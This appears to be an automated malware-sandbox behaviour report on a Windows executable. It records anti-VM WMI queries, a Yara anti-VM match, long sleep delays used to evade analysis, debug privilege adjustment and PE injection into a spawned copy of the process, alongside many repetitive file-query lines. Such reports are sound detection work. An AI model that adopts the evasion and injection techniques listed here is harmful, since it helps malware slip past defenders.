Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: qJ64p5G1XJ.exe PID: 6900, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: 2780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: 4780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: 8870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: 7140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: 9870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: A870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: AE70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: BE70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: CE70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: 2920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Memory allocated: 4920000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Window / User API: threadDelayed 3225			Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Window / User API: threadDelayed 6505			Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe TID: 6984	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe TID: 2448	Thread sleep time: -33204139332677172s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: qJ64p5G1XJ.exe, 00000004.00000002.1858487637.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe

Memory written: C:\Users\user\Desktop\qJ64p5G1XJ.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process created: C:\Users\user\Desktop\qJ64p5G1XJ.exe "C:\Users\user\Desktop\qJ64p5G1XJ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process created: C:\Users\user\Desktop\qJ64p5G1XJ.exe "C:\Users\user\Desktop\qJ64p5G1XJ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Process created: C:\Users\user\Desktop\qJ64p5G1XJ.exe "C:\Users\user\Desktop\qJ64p5G1XJ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Users\user\Desktop\qJ64p5G1XJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
